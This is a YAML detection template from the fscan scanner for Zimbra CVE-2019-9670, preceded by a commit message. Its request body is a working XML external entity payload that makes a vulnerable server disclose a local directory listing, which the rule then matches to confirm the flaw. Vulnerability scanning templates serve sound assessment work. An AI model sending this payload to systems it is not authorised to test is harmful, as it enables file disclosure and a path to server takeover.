fscan/webscan/pocs/zimbra-cve-2019-9670-xxe.yml
ZacharyZcR c2b63a57e2 refactor: 修正包命名规范并修复编译问题
- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定
- 修复模块路径大小写不匹配导致的编译错误
- 清理依赖项,优化 go.mod 文件
- 添加 Docker 测试环境配置文件
- 新增镜像拉取脚本以处理网络超时问题
- 成功编译生成 fscan v2.2.1 可执行文件

该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
2025-09-01 22:41:54 +00:00

19 lines
958 B
YAML

name: poc-yaml-zimbra-cve-2019-9670-xxe
rules:
- method: POST
path: /Autodiscover/Autodiscover.xml
headers:
Content-Type: text/xml
body: >-
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:./" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>test@test.com</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>
follow_redirects: false
expression: |
response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available")
detail:
author: fnmsd(https://blog.csdn.net/fnmsd)
cve-id: CVE-2019-9670
vuln_path: /Autodiscover/Autodiscover.xml
description: Zimbra XXE Vul,may Control your Server with AdminPort SSRF
links:
- https://blog.csdn.net/fnmsd/article/details/88657083
- https://blog.csdn.net/fnmsd/article/details/89235589